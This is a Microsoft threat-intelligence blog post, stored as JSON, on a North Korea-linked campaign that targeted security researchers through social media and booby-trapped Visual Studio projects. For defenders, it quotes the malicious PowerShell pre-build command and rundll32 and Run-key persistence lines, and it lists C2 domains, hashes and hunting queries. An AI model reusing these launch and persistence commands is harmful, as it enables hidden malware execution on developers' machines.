{"id":92718,"date":"2021-01-28T09:00:55","date_gmt":"2021-01-28T17:00:55","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/?p=92718"},"modified":"2024-05-22T10:44:55","modified_gmt":"2024-05-22T17:44:55","slug":"zinc-attacks-against-security-researchers","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2021\/01\/28\/zinc-attacks-against-security-researchers\/","title":{"rendered":"ZINC attacks against security researchers"},"content":{"rendered":"\n
\nApril 2023 update<\/strong> \u2013 Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. Zinc<\/strong> is now tracked as Diamond Sleet<\/strong>.<\/p>\n\n\n\n
To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy<\/strong><\/a>.<\/p>\n<\/blockquote>\n\n\n
In recent months, Microsoft has detected cyberattacks targeting security researchers by an actor we track as ZINC. The campaign originally came to our attention after Microsoft Defender for Endpoint detected an attack in progress. Observed targeting includes pen testers, private offensive security researchers, and employees at security and tech companies. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to ZINC, a DPRK-affiliated and state-sponsored group, based on observed tradecraft, infrastructure, malware patterns, and account affiliations.<\/p>\n
This ongoing campaign was reported by Google\u2019s Threat Analysis Group (TAG<\/a>) earlier this week<\/a>, capturing the browser-facing impact of this attack. By sharing additional details of the attack, we hope to raise awareness in the cybersecurity community about additional techniques used in this campaign and serve as a reminder to security professionals that they are high-value targets for attackers.<\/p>\n
We also want to thank our industry colleagues at Twitter and GitHub for their collaboration in this investigation and rapid actions to suspend the malicious accounts targeting the security community and our mutual customers.<\/p>\n
We are sharing this information with the community as part of our mission to shine a light on bad actors and elevate awareness of low-profile tactics and techniques that easily fly under the radar of security operations centers (SOCs) or security professionals and are easily overlooked as low-level alerts or benign chatter. The related IoCs and Microsoft Defender for Endpoint<\/a> product detections we share in this blog will help SOCs proactively hunt for related activity in their environments and elevate any low-level alerts for remediation. ZINC used a variety of new techniques to target the victims, including gaining credibility on social media with genuine content, sending malicious Visual Studio projects, and using a watering hole website weaponized with browser exploits.<\/p>\n
Technical details<\/h2>\n
In mid-2020, ZINC started building a reputation in the security research community on Twitter by retweeting high quality security content and posting about exploit research from an actor-controlled blog. Throughout the lifetime of the campaign, the actor operated several accounts that accounted for roughly 2,000 followers, including many prominent security researchers.<\/p>\n
In the image below, one of the actor-controlled Twitter account retweets another of their accounts to amplify their own posts. The posts from the actors received a reasonable amount of attention, usually accumulating several hundred likes or retweets.<\/p>\n
<\/p>\n
Figure <\/em>1.<\/em> Actor-controlled Twitter handles<\/em><\/p>\n
After building their reputation across their established social media accounts, the actors started approaching potential targets on social media platforms such as Twitter and LinkedIn. The conversations were often seemingly innocuous, asking security questions or talking about exploit techniques. If the researcher was responsive, the actor would offer to move communication to another platform (e.g., email, Discord) in some cases to then send files using encrypted or PGP protected ZIPs.<\/p>\n
ZINC also used their Twitter accounts to post links to a security blog they owned (br0vvnn[.]io<\/em>). These links were also shared by many others in the security community on Twitter and other social media platforms, further deepening trust for the owner and content.<\/p>\n
A blog post titled DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug<\/em>, was shared by the actor on October 14, 2020 from Twitter. From October 19-21, 2020, some researchers, who hadn\u2019t been contacted or sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC malware on their machines soon after. This suggests that a Chrome browser exploit chain was likely hosted on the blog, although we haven\u2019t been able to prove this. Since some of the victim\u2019s browsers were fully patched, it\u2019s also suspected, but unproven, that the exploit chain used 0-day or patch gap<\/a> exploits. We believe that not all visitors to the site were compromised, even during the dates listed above.<\/p>\n
Malicious Visual Studio project<\/h3>\n
Some of the files sent by ZINC to researchers were malicious Visual Studio projects that included prebuilt binaries. One of the binaries used the well-known name Browse.vc.db<\/em> but was a malicious DLL rather than a database file. Microsoft Defender for Endpoint detects these DLLs as Comebacker malware. A pre-build event with a PowerShell command was used to launch Comebacker via rundll32<\/em>. This use of a malicious pre-build event is an innovative technique to gain execution.<\/p>\n
An example of the PowerShell in the pre-build event can be seen here:<\/p>\n
<PreBuildEvent><\/em><\/p>\n
<Command><\/em>
powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\\Debug\\Browse.VC.db)){rundll32 x64\\Debug\\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }<\/em>
<\/Command><\/em><\/p>\n<\/PreBuildEvent><\/em><\/p>\n
Pre-build events are stored in the .vcxproj file in Visual Studio solutions. The page How to: Use Build Events in MSBuild Projects<\/a> has a list of other build events and example XML for the events. It would also be possible to abuse a custom build step in the same way.<\/p>\n
Analyzing Comebacker DLLs<\/h3>\n
Once the malicious Visual Studio Project file was built, the process drops C:\\ProgramData\\VirtualBox\\update.bin<\/em> and adds the file to an autostart registry key. Update.bin (SHA-256: 25d8ae46\u2026<\/em>) is a different 64-bit DLL file embedded inside Browser.VC.db.<\/p>\n
\n
- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update<\/em><\/li>\n
- “C:\\Windows\\System32\\rundll32.exe C:\\ProgramData\\VirtualBox\\update.bin,ASN2_TYPE_new 5I9YjCZ0xlV45Ui8 2907”<\/em><\/li>\n<\/ul>\n
The actors put some effort into modifying the Comebacker malware attributes between deployments; file names, file paths and exported functions were regularly changed so these static IOCs can\u2019t be solely relied upon for dependable detection. We were first alerted to the attack when Microsoft Defender for Endpoint detected the Comebacker DLL attempting to perform process privilege escalation. See the Microsoft Defender for Endpoint detections section for a full process chain of the attack.<\/p>\n
Klackring malware<\/h3>\n
Klackring is a DLL that registers a malicious service on the targeted machine. It was deployed to victims either by the Comebacker malware or an unknown dropper. The DLL was dropped to C:\\Windows\\system32 <\/em>and saved with the .sys <\/em>file extension.<\/p>\n
MHTML file<\/h3>\n
In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn<\/em> blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.<\/p>\n
Driver abuse<\/h3>\n
In one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys<\/em> driver from the Vir.IT eXplorer <\/em>antivirus. The file was dropped to the victim system as C:\\Windows\\System32\\drivers\\circlassio.sys<\/em>. The actor then attempted to exploit CVE-2017-16238, described by the finder here<\/a>, where the driver doesn\u2019t perform adequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The actor\u2019s code however appears to be buggy and when attempting to exploit the vulnerability the exploit tried to overwrite some of the driver\u2019s own code which crashed the victim\u2019s machine.<\/p>\n
Other malware<\/h3>\n
Other tools used included an encrypted Chrome password-stealer hosted on ZINC domain https:\/\/codevexillium[.]org<\/em>. The host DLL (SHA-256: ada7e80c<\/em>\u2026) was downloaded to the path C:\\ProgramData\\USOShared\\USOShared.bin <\/em>using PowerShell and then ran via rundll32<\/em>.\u00a0 This malware is a weaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506\u2026<\/em>), which it dropped to C:\\ProgramData\\USOShared\\USOShared.dat<\/em>.<\/p>\n
C2 communication<\/h3>\n
After establishing a command-and-control (C2) channel on a targeted device, the backdoor is configured to check into the C2 servers every 60 seconds. Over this C2 channel, the threat actors can execute remote commands to enumerate files\/directories and running processes, and to collect\/upload information about the target device, including IP address, Computer Name, and NetBIOS.\u00a0 Furthermore, we observed some hands-on-keyboard action to enumerate all files\/directories on the target disk, create screenshots, and deploy additional modules.<\/p>\n
Microsoft Defender for Endpoint detections<\/h2>\n
When malware is run from a malicious Visual Studio project, the following alerts and process tree are generated by Microsoft Defender for Endpoint. Multiple alerts, including \u201cUse of living-off-land binary to run malware\u201d and \u201cProcess Privilege escalation\u201d, were triggered on the execution of Browser.VC.db<\/em> and update.bin<\/em>.<\/p>\n
Microsoft Defender for Endpoint<\/a> has comprehensive detection coverage for this campaign. These detections raise alerts that inform security operations teams about the presence of activities and artifact from the attacks. Security operations and incident response teams can use investigation and remediation tools in Microsoft Defender Endpoint to perform deep investigation and additional hunting.<\/p>\n
<\/p>\n
Figure 2. Alert raised by Microsoft Defender for Endpoint on ComeBacker<\/em><\/p>\n
<\/p>\n
Figure 3. Alert raised by Microsoft Defender for Endpoint on low-reputation arbitrary code executed by signed executable<\/em><\/p>\n
Recommended actions and preventative measures<\/h2>\n
If you visited the referenced ZINC-owned blog (br0vvnn[.]io<\/em>), you should immediately run a full antimalware scan and use the provided IOCs to check your systems for intrusion. If a scan or searching for the IOCs find any related malware on your systems, you should assume full compromise and rebuild. Microsoft assesses that security research was the likely objective of the attack, and any information on the affected machine may be compromised.<\/p>\n
For proactive prevention of this type of attack, it is recommended that security professionals use an isolated environment (e.g., a virtual machine) for building untrusted projects in Visual Studio or opening any links or files sent by unknown parties.<\/p>\n
Associated indicators of compromise (IOCs)<\/h2>\n
The below list provides IOCs observed during this activity. We encourage our customers to implement detections and protections to identify possible prior campaigns or prevent future campaigns against their systems.<\/p>\n
Azure Sentinel customers can find a Sentinel query containing these indicators in this GitHub repo: https:\/\/github.com\/Azure\/Azure-Sentinel\/tree\/master\/Detections\/MultipleDataSources\/ZincJan272021IOCs.yaml<\/a><\/p>\n
Microsoft 365 Defender customers can find related hunting queries below or at this GitHub repo:\u00a0https:\/\/github.com\/microsoft\/Microsoft-365-Defender-Hunting-Queries\/<\/a><\/p>\n
Microsoft Defender for Endpoint detections for malware<\/h3>\n
\n
- Backdoor:Script\/ComebackerCompile.A!dha<\/a><\/li>\n
- Trojan:Win64\/Comebacker.A!dha<\/a><\/li>\n
- Trojan:Win64\/Comebacker.A.gen!dha<\/a><\/li>\n
- Trojan:Win64\/Comebacker.B.gen!dha<\/a><\/li>\n
- Trojan:Win32\/Comebacker.C.gen!dha<\/a><\/li>\n
- Trojan:Win32\/Klackring.A!dha<\/a><\/li>\n
- Trojan:Win32\/Klackring.B!dha<\/a><\/li>\n<\/ul>\n
Actor-controlled Twitter Handles<\/h3>\n
\n
- https:\/\/twitter.com\/z055g<\/li>\n
- https:\/\/twitter.com\/james0x40<\/li>\n
- https:\/\/twitter.com\/mvp4p3r<\/li>\n
- https:\/\/twitter.com\/dev0exp<\/li>\n
- https:\/\/twitter.com\/BrownSec3Labs<\/li>\n
- https:\/\/twitter.com\/br0vvnn<\/li>\n
- https:\/\/twitter.com\/0xDaria<\/li>\n<\/ul>\n
Actor-controlled LinkedIn profiles<\/h3>\n
\n
- https:\/\/www.linkedin.com\/in\/james-williamson-55a9b81a6\/<\/li>\n
- https:\/\/www.linkedin.com\/in\/guo-zhang-b152721bb\/<\/li>\n
- https:\/\/www.linkedin.com\/in\/linshuang-li-aa69391bb\/<\/li>\n<\/ul>\n
Actor-controlled GitHub Accounts<\/h3>\n
Further investigation revealed a number of GitHub accounts with names matching the Twitter handles published by Google:<\/p>\n
\n
- https:\/\/github.com\/br0vvnn<\/li>\n
- https:\/\/github.com\/dev0exp<\/li>\n
- https:\/\/github.com\/henya290<\/li>\n
- https:\/\/github.com\/james0x40<\/li>\n
- https:\/\/github.com\/tjrim91<\/li>\n<\/ul>\n
Actor-controlled blog URLs<\/h3>\n
\n
- https:\/\/br0vvnn[.]io<\/li>\n
- https:\/\/blog.br0vvnn[.]io<\/li>\n<\/ul>\n
Actor-controlled C2 domains<\/h3>\n
\n
- codevexillium[.]org<\/li>\n
- angeldonationblog[.]com<\/li>\n
- investbooking[.]de<\/li>\n
- krakenfolio[.]com<\/li>\n<\/ul>\n
Likely legitimate but compromised websites used as C2<\/h3>\n
\n
- www.dronerc[.]it<\/li>\n
- www.edujikim[.]com<\/li>\n
- www.fabioluciani[.]com<\/li>\n
- trophylab[.]com<\/li>\n
- forums.joycity[.]com<\/li>\n
- Marcodetech[.]net<\/li>\n
- Linelcssplugin[.]org<\/li>\n<\/ul>\n
C2 URLs<\/h3>\n
\n
- https:\/\/codevexillium[.]org\/image\/download\/download.asp<\/li>\n
- https:\/\/angeldonationblog[.]com\/image\/upload\/upload.php<\/li>\n
- https:\/\/www.dronerc[.]it\/shop_testbr\/Core\/upload.php<\/li>\n
- https:\/\/www.dronerc[.]it\/forum\/uploads\/index.php<\/li>\n
- https:\/\/www.dronerc[.]it\/shop_testbr\/upload\/upload.php<\/li>\n
- https:\/\/www.edujikim[.]com\/intro\/blue\/insert.asp<\/li>\n
- https:\/\/investbooking[.]de\/upload\/upload.asp<\/li>\n<\/ul>\n
Malware hashes<\/h3>\n
Malicious Visual Studio .vcxproj files<\/h4>\n
\n
- 0ac5c8ad0c2ddef4d41724acac586ffabcc92ab9d4906a4fc4a1ff2ec2feec7c<\/li>\n
- 1cc60cb1e08779ff140dfbb4358a7c2587ba58ad2f1f23343b9efb51bb25aaed<\/li>\n
- 5024f199836692fe428aef3d41a561448632e9cbab954f842ef300573600423d<\/li>\n
- 98a6e0c8b8ec4dbbc3ef21308ec04912fa38e84828cedad99e081d588811ba5e<\/li>\n
- d02752aadc71fafa950a6a51b1298dc914e81d20f95a86b12ee07cd2d2a85711<\/li>\n<\/ul>\n
Comebacker malware<\/h4>\n
\n
- 0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa<\/li>\n
- 133280e985448a3cfa8906830af137634c4657740a8c7209a368c5a0d0b3dabf<\/li>\n
- 25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc<\/li>\n
- 284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f<\/li>\n
- 34e13e2efb336fbe8202ca931a496aa451cf554450806b63d25a57a627e0fb65<\/li>\n
- 39ad9ae3780c2f6d41b1897e78f2b2b6d549365f5f024bc68d1fe794b940f9f1<\/li>\n
- 4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244<\/li>\n
- 68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7<\/li>\n
- 80a19caf4cfc9717d449975f98a157d0a483bf48a05e3b6f7a9b204faa8c35d1<\/li>\n
- 88aeaff0d989db824d6e9429cd94bc22bbbfc39775c0929e703343798f69e9cc<\/li>\n
- 913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54<\/li>\n
- ca48fa63bd603c74ab02841fc6b6e90c29a9b740232628fadafa923d2833a314<\/li>\n
- d0678fe8c92912698c4b9d4d03d83131e16d8b219ccf373fa847da476788785b<\/li>\n
- 5815103140c68614fd7fc05bad540e654a37b81b7e451e213128f2eff081005a<\/li>\n
- e413e8094d76061f094f8b9339d00d80514065f7d37c184543c0f80c5d51bd80<\/li>\n
- c23f50c8014c190afa14b4c2c9b85512fb3a75405652c9b6be1401f678295f36<\/li>\n
- a75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855<\/li>\n<\/ul>\n
Klackring malware<\/h4>\n
\n
- 0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa<\/li>\n
- 16ad21aedf8f43fcedaa19dbd4f4fda0f3fec0517662b99a3054dac6542ab865<\/li>\n
- 1d9a58bc9b6b22fb3e3099996dbab13bfc5258b8307026f66fa69729d40f2b13<\/li>\n
- 4bfeb22ec438cf7ed8a7fefe6e7f321d842ad6ade0ca772732d1a757177e7ad7<\/li>\n
- 6b3a693d391426182fc2944d14b0816cdf1e5f87c13d6eb697756f9577b0bcee<\/li>\n
- 70e1f774c0c80e988641d709d3a6990193e039b1ce618ceaacc1d61a850e9b76<\/li>\n
- 77a9a0f67d09cafaf05ee090483a64622a7a04dfe226763f68651b071c1802f2<\/li>\n
- 8d85e31de2623538a42a211e3919d5602f99dc80f21e0c5f99d53838b2b07063<\/li>\n
- 90b4bd609b84c41beeed5b9310f2d84de83c74aaecfd1facc02e278be5059110<\/li>\n
- 9c90bbe4b61136d94170e90c299adab0d1ccbc3a8f71519799dd901d742f3561<\/li>\n
- 9f23069f74d0fb09823ad7f46f338d7920a731622404a7754df36ffbc40f8744<\/li>\n
- a1c4c617d99d10bbb2524b4d5bfdcf00f47d9cf39e8c7d3e6a9ce1219393da5a<\/li>\n
- a4fb20b15efd72f983f0fb3325c0352d8a266a69bb5f6ca2eba0556c3e00bd15<\/li>\n
- aa5264323755a7dfa7c39ada09224c8c1de03ec8aeb6f7b216a56e8475e5f547<\/li>\n
- aeb6fb0ba6d947b4ee67a5111fbdf798c4488377ae28bdf537c1f920a58785b7<\/li>\n
- b47969e73931546fdcfb1e69c43da911dc9f7bb8d0e211731a253b572ecdc4fe<\/li>\n
- bc19a9415428973d65358291d604d96a0915a01d4b06939269b9e210f23aad43<\/li>\n
- c5d13324100047d7def82eeafdb6fc98cc2ccfae56db66ada9f1c3c7429ef9cb<\/li>\n
- dcc986c48c9c99c012ae2b314ac3f2223e217aee2ccdfb733cbbdaea0b713589<\/li>\n
- e8cf9b04ba7054e1c34bda05106478f9071f8f6569b4822070834abbf8e07a95<\/li>\n
- b32319da446dcf83378ab714f5ad0229dff43c9c6b345b69f1a397c951c1122e<\/li>\n
- 11fef660dec27474c0c6c856a7b4619155821fdd1ce404848513a2700be806a5<\/li>\n
- 9e562cc5c3eb48a5f1a1ccd29bf4b2ff4ab946f45aa5d8ea170f69104b684023<\/li>\n<\/ul>\n
viaglt64.sys \u2013 Vulnerable Vir.IT driver for CVE-2017-16238<\/h4>\n
\n
- 58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495<\/li>\n<\/ul>\n
Other malware and tools<\/h4>\n
These are hashes of files we believe to be related to the attack but aren\u2019t Comebacker or Klackring malware.<\/p>\n
This list includes some hashes where we haven\u2019t been able to retrieve a sample but based on the file usage or location looks likely to be related.<\/p>\n
\n
- e0e59bfc22876c170af65dcbf19f744ae560cc43b720b23b9d248f4505c02f3e<\/li>\n
- 3d3195697521973efe0097a320cbce0f0f98d29d50e044f4505e1fbc043e8cf9<\/li>\n
- 0a2d81164d524be7022ba8fd4e1e8e01bfd65407148569d172e2171b5cd76cd4<\/li>\n
- 96d7a93f6691303d39a9cc270b8814151dfec5683e12094537fd580afdf2e5fe<\/li>\n
- dc4cf164635db06b2a0b62d313dbd186350bca6fc88438617411a68df13ec83c<\/li>\n
- 46efd5179e43c9cbf07dcec22ce0d5527e2402655aee3afc016e5c260650284a<\/li>\n
- 95e42a94d4df1e7e472998f43b9879eb34aaa93f3705d7d3ef9e3b97349d7008<\/li>\n
- 9d5320e883264a80ea214077f44b1d4b22155446ad5083f4b27d2ab5bd127ef5<\/li>\n
- 9fd05063ad203581a126232ac68027ca731290d17bd43b5d3311e8153c893fe3<\/li>\n
- ada7e80c9d09f3efb39b729af238fcdf375383caaf0e9e0aed303931dc73b720<\/li>\n
- edb1597789c7ed784b85367a36440bf05267ac786efe5a4044ec23e490864cee<\/li>\n
- 33665ce1157ddb7cd7e905e3356b39245dfba17b7a658bdbf02b6968656b9998<\/li>\n
- 3ab770458577eb72bd6239fe97c35e7eb8816bce5a4b47da7bd0382622854f7c<\/li>\n
- b630ad8ffa11003693ce8431d2f1c6b8b126cd32b657a4bfa9c0dbe70b007d6c<\/li>\n
- 53f3e55c1217dafb8801af7087e7d68b605e2b6dde6368fceea14496c8a9f3e5<\/li>\n
- 99c95b5272c5b11093eed3ef2272e304b7a9311a22ff78caeb91632211fcb777<\/li>\n
- f21abadef52b4dbd01ad330efb28ef50f8205f57916a26daf5de02249c0f24ef<\/li>\n
- 2cbdea62e26d06080d114bbd922d6368807d7c6b950b1421d0aa030eca7e85da<\/li>\n
- 079659fac6bd9a1ce28384e7e3a465be4380acade3b4a4a4f0e67fd0260e9447<\/li>\n
- 0b9133bc24593a358c0471da4aa9c7479270dab93c0941e5132af6ba177c5228<\/li>\n<\/ul>\n
Host IOCs<\/h3>\n
Comebacker Visual Studio Project file execution<\/strong><\/p>\n
Rundll32.exe dxgkrnl_poc.vcxproj.suo,CMS_dataFinal Bx9yb37GEcJNK6bt 4231<\/em><\/p>\n
Comebacker file names and exported function name<\/strong><\/p>\n
Note that the file name was often changed and these names shouldn\u2019t be considered a definitive list:<\/p>\n
\n
- Browse.vc.db,ENGINE_get_RAND<\/em><\/li>\n
- NVIDIA.bin,SSL_HandShaking<\/em><\/li>\n
- adobe.bin,SSL_HandShaking<\/em><\/li>\n
- USOShared.bin,ntWindowsProc<\/em><\/li>\n
- update.dat,SetWebFilterString<\/em><\/li>\n
- update.bin,CleanupBrokerString<\/em><\/li>\n
- ntuser.db,glInitSampler<\/em><\/li>\n
- RdrCEF.bin,json_object_get_unicode_string<\/em><\/li>\n
- update.bin,ASN2_TYPE_new<\/em><\/li>\n
- USO.DAT,deflateSuffix<\/em><\/li>\n
- USO.DAT,cmsSetLogHandlerTHR<\/em><\/li>\n
- USO.DAT,sql_blob_open<\/em><\/li>\n
- localdb.db,ntSystemInfo<\/em><\/li>\n<\/ul>\n
Registry Key<\/h3>\n
\n
- HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update<\/em><\/li>\n<\/ul>\n
File path<\/h3>\n
Klackring<\/strong><\/p>\n
This malware was deployed as a .sys file in C:\\windows\\system32\\<\/em><\/p>\n
\n
- C:\\Windows\\System32\\helpsvc.sys<\/em><\/li>\n
- C:\\Windows\\System32\\Irmon.sys<\/em><\/li>\n
- C:\\Windows\\System32\\LogonHours.sys<\/em><\/li>\n
- C:\\Windows\\System32\\Ntmssvc.sys<\/em><\/li>\n
- C:\\Windows\\System32\\NWCWorkstation.sys<\/em><\/li>\n
- C:\\Windows\\System32\\Nwsapagent.sys<\/em><\/li>\n
- C:\\Windows\\System32\\PCAudit.sys<\/em><\/li>\n
- C:\\Windows\\System32\\uploadmgr.sys<\/em><\/li>\n<\/ul>\n
Generic folders and file paths for malware and tooling<\/strong><\/p>\n
These are folders and file paths that have been used by ZINC for malware and tools but may be used by other actors or produce false positives.<\/p>\n
Look for .bin, .db, .dat, and .cpl files in the following folders, USOShared <\/em>was most used across victims:<\/p>\n
\n
- C:\\ProgramData\\USOShared\\<\/em><\/li>\n
- C:\\ProgramData\\Adobe\\<\/em><\/li>\n
- C:\\ProgramData\\Mozilla\\<\/em><\/li>\n
- C:\\ProgramData\\NVIDIA\\<\/em><\/li>\n
- C:\\ProgramData\\Oracle\\<\/em><\/li>\n
- C:\\ProgramData\\VirtualBox\\<\/em><\/li>\n<\/ul>\n
Check these file paths for additional malware and tooling:<\/p>\n
\n
- C:\\MSCache\\msomui.dat<\/em><\/li>\n
- C:\\MSCache\\local.cpl<\/em><\/li>\n
- C:\\ProgramData\\ntuser.db<\/em><\/li>\n
- C:\\ProgramData\\ntuser.ini<\/em><\/li>\n
- C:\\ProgramData\\taskhost.exe<\/em><\/li>\n
- C:\\ProgramData\\Adobe\\get.exe<\/em><\/li>\n
- C:\\ProgramData\\Adobe\\ARM\\AdobeUpdate.exe<\/em><\/li>\n
- C:\\ProgramData\\Mozilla\\update.bin<\/em><\/li>\n
- C:\\ProgramData\\NVIDIA\\graphicscheck.exe<\/em><\/li>\n
- C:\\ProgramData\\NVIDIA\\NVIDIA.bin<\/em><\/li>\n
- C:\\ProgramData\\Oracle\\java.db<\/em><\/li>\n
- C:\\ProgramData\\Oracle\\java.cpl<\/em><\/li>\n
- C:\\ProgramData\\USOShared\\Search.bin<\/em><\/li>\n
- C:\\Windows\\netsvc.exe<\/em><\/li>\n
- C:\\Windows\\system32\\kjchost.dll<\/em><\/li>\n
- C:\\Windows\\System32\\traextapi.dll<\/em><\/li>\n
- C:\\Windows\\System32\\healthextapi.dll<\/em><\/li>\n
- C:\\Windows\\System32\\detaextapi.dll<\/em><\/li>\n
- C:\\Windows\\Temp\\ads.tmp<\/em><\/li>\n
- C:\\windows\\Temp\\CA_Root.pfx<\/em><\/li>\n
- C:\\Recovery\\recover.bin<\/em><\/li>\n
- C:\\Recovery\\re.bin<\/em><\/li>\n<\/ul>\n
Advanced hunting queries<\/h3>\n
To locate possible exploitation activity related to the contents of this blog, you can run the following\u00a0advanced hunting<\/a> queries via Microsoft Defender for Endpoint:<\/p>\n
Command and control<\/strong><\/p>\n
Look for backdoor establishing network connections to command and control. Run query in Microsoft Defender for Endpoint<\/a><\/p>\n
DeviceNetworkEvents \n| where RemoteUrl in~('codevexillium.org',\n'angeldonationblog.com',\n'investbooking.de',\n'krakenfolio.com')<\/pre>\nExecution<\/strong><\/p>\n
Look for PowerShell launched from MSBUILD with the related commands.